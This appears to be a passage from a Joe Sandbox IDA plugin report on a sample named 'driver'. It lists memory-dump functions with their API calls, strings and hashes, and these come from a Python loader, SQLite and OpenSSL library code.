Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: dd90a4479ba71e44dedb97b9a062242b20196015a5516087af12020732465272
Instruction ID: 00d43df6436f02759240de2d845d39454300c9a40c99d6ae1f0535fa5bbe4620
Opcode Fuzzy Hash: dd90a4479ba71e44dedb97b9a062242b20196015a5516087af12020732465272
Instruction Fuzzy Hash: 6C51C322A4A64286EA609B13A4503BA6291FF85F98F844135ED4DC7BD7EFBCE501E700

Function 00007FF6A29B36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6A29B3804), ref: 00007FF6A29B36E1
GetLastError.KERNEL32(?,00007FF6A29B3804), ref: 00007FF6A29B36EB

Part of subcall function 00007FF6A29B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
Part of subcall function 00007FF6A29B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
Part of subcall function 00007FF6A29B2C50: MessageBoxW.USER32 ref: 00007FF6A29B2D99

Strings

Failed to resolve full path to executable %ls., xrefs: 00007FF6A29B3739
Failed to convert executable path to UTF-8., xrefs: 00007FF6A29B3790
Failed to obtain executable path., xrefs: 00007FF6A29B36F3
\\?\, xrefs: 00007FF6A29B375A
GetModuleFileNameW, xrefs: 00007FF6A29B36FA

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: a38038be8dc44f9f10bcded8a5fb8c6cbd58bcb52eb1dff2abb6d5f16e8876be
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: F421B661F9E64281FA20D722E8513BA2294FF88F9DF804136E55DC29D7EEACE504E704

Function 00007FF6A29CBACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CBEF9

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction ID: c0caccf4c443a235cef339b66d8bafa4e06562aa49e1c3b48daffdc604db38c5
Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction Fuzzy Hash: 58C1F662A8E68649E7609B1790202BE7752EF80F88F554131EA4E837D3CFFCF855A340

Function 00007FF8A8688FF0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FF8B9F73010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FF8A86CD120), ref: 00007FF8A868918D

Strings

API called with finalized prepared statement, xrefs: 00007FF8A868901C
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A868903A
API called with NULL prepared statement, xrefs: 00007FF8A8689004
%s at line %d of [%.10s], xrefs: 00007FF8A8689053
misuse, xrefs: 00007FF8A8689047

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
API String ID: 22509725-3538577999
Opcode ID: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
Instruction ID: 4a50e46ab6f97ccc86f561c53d0453ae33692bc18125e6e738206a3471898a32
Opcode Fuzzy Hash: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
Instruction Fuzzy Hash: 5151F422F0F652A5FB549B61981C2B863A1EF41BD4F486135CE9D077C5EF3CE8428328

Function 00007FF6A29B6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Failed to load Python DLL '%ls'., xrefs: 00007FF6A29B6497
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6A29B63B7
LoadLibrary, xrefs: 00007FF6A29B649E
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6A29B63F7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6A29B6446
ucrtbase.dll, xrefs: 00007FF6A29B63CD

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
Instruction ID: aa9a573f4e193643605a188e915c880e9098a14ac765e0c876529104bbaf8b20
Opcode Fuzzy Hash: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
Instruction Fuzzy Hash: 31416531A5EA8791EA11DB22E4552F96351FF44B48F800132EA5DC369BEFBCF605E740

Function 00007FF8A865FFE0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF8A866021A

Strings

winOpen, xrefs: 00007FF8A866048D
psow, xrefs: 00007FF8A8660591
exclusive, xrefs: 00007FF8A86601AB
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FF8A86602F6

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
Instruction ID: ac23739165122abf5c0678f1a62847ebb7d27bb99e10e8d702bd7f1fbf30a09b
Opcode Fuzzy Hash: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
Instruction Fuzzy Hash: C102B431E0F682AAFB588B51A85877963A1FF84BC4F045235DD4F536A0CF3CE4848729

Function 00007FF8A865D9F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A865DA33
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A865DA5C
ReadFile.KERNEL32 ref: 00007FF8A865DAAF

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FF8A865DB48
winRead, xrefs: 00007FF8A865DB07

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010$FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2521573588-1843600136
Opcode ID: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
Instruction ID: b335cb3acc29631abf77a1678ecc84752f71fbeecf37d07ce5286e1974446c5a
Opcode Fuzzy Hash: f95efd6465811686e2e1312b352b3daf93e66d5956d10e206f7f168eed4a686f
Instruction Fuzzy Hash: 7D413332A0E646AAF6149F25E8489BA7BA6FB547C4F446032EA4D437D4DF3CE4428358

Function 00007FF6A29CF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6A29CFAEC
_get_daylight.LIBCMT ref: 00007FF6A29CFAFD
_get_daylight.LIBCMT ref: 00007FF6A29CFB0E
_isindst.LIBCMT ref: 00007FF6A29CFBD9

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 0ade7742cb1139ad6edad806c389d333ff31c7ee319d8aa32b82e6c29b3de311
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 7A51E672F4A2118BFB18CF65D9516BC27A1AB00F9CF50413AEE1DD2AE6DF78B4019700

Function 00007FF6A29C57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6A29C581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF6A29C5881
GetLastError.KERNEL32 ref: 00007FF6A29C5912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29C5724), ref: 00007FF6A29C595E

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
Instruction ID: 34345da926f105f09844a299d8685bc2fc463766ad38cf1b0ea008df153402ce
Opcode Fuzzy Hash: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
Instruction Fuzzy Hash: 9B517C22E4A6418AFB14DFB2D4503BD23B1BB48F9DF548435DE4DA768ADFB8E441A700

Function 00007FF6A29C5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C56C5
CreateFileW.KERNEL32 ref: 00007FF6A29C5704
CloseHandle.KERNEL32 ref: 00007FF6A29C5739

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction ID: af24e6ae04aa384eaf642277f0b4bd08a85d39d302fba75e2ac716e15e3b23bc
Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction Fuzzy Hash: 0641B522E597828BF3149B22951037963A0FB94F98F109335EA5C53AD3DFBCB4E09700

Function 00007FF8A80414F1 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 231COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A8087D72

Strings

ssl3_read_n, xrefs: 00007FF8A8087C0A, 00007FF8A8087D12, 00007FF8A8087E31, 00007FF8A8087E9A
..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FF8A8087C16, 00007FF8A8087D1E, 00007FF8A8087E3D, 00007FF8A8087EA6

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
API String ID: 1452528299-4226281315
Opcode ID: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
Instruction ID: 6b6d3d1733aacba4b384f30928ed86b13e3af49b0ef67f767abe668219ae2257
Opcode Fuzzy Hash: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
Instruction Fuzzy Hash: FAA19A21B0AA82A2FF50AF25D8157B93A90EF44BC4F544135DE4D0BBD9DF3CD8A58728

Function 00007FF8A80414BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A809F1C3

Strings

..\s\ssl\statem\statem.c, xrefs: 00007FF8A809F2B5, 00007FF8A809F45C, 00007FF8A809F48F
state_machine, xrefs: 00007FF8A809F2AE, 00007FF8A809F450, 00007FF8A809F483

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\statem\statem.c$state_machine
API String ID: 1452528299-1722249466
Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction ID: 216ccac2aeea0e1d787c5935be936963c6965305b8a21ddc50c918183cf33211
Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction Fuzzy Hash: D1A16522A0EA43A5FF649A35E8423BD3694EF41BC4F244035DD4D466DACF3CE8618779

Function 00007FF8A804127B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A8088AC5

Strings

ssl3_write_pending, xrefs: 00007FF8A8088B62, 00007FF8A8088BBE
..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FF8A8088B6E, 00007FF8A8088BCA

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
API String ID: 1452528299-1219543453
Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction ID: 4e05ea7befb2d79b70eb1c4458b4d2ab7281515fa33257f6f4f0bba41ad722ee
Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
Instruction Fuzzy Hash: 23419862B0AA86A6FF509B15D4447AA73A0FF80BD4F148135DA4C07BD6DF3DE4B18718

Function 00007FF6A29BCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A29BCE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6A29BCE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6A29BCCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF6A29BCD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6A29BCD91

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: c148c9aa73422208d980bb07c7718939a48255daa0e182e7742f38094fa45c89
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 8C314B24E8B1435AFA54AB2794253B916919F85F8CF440438E54DCB2D3DEECF805A250

Function 00007FF6A29C01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C01F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C02E7

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 11bafb8702b7b25db2b9093d4a80d2cc83c0ff6dfd8ab14d6a58533e492f9852
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: AA51C661B8F2514EEA289E67940067E6691AF44FACF144734DD6D87BCBCFBCF401A600

Function 00007FF6A29CC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6A29CC33D), ref: 00007FF6A29CC1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF6A29CC33D), ref: 00007FF6A29CC1FA

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: adb64a7c1b0ee9e0a91fff866cf25c4ab2f9d1114ce483fa9e1f659952c6bfb3
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 35112361B09B8185EA108B27E814169A761FB45FF8F644331EE7D8B7EACFBCE0119700

Function 00007FF6A29C5994 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

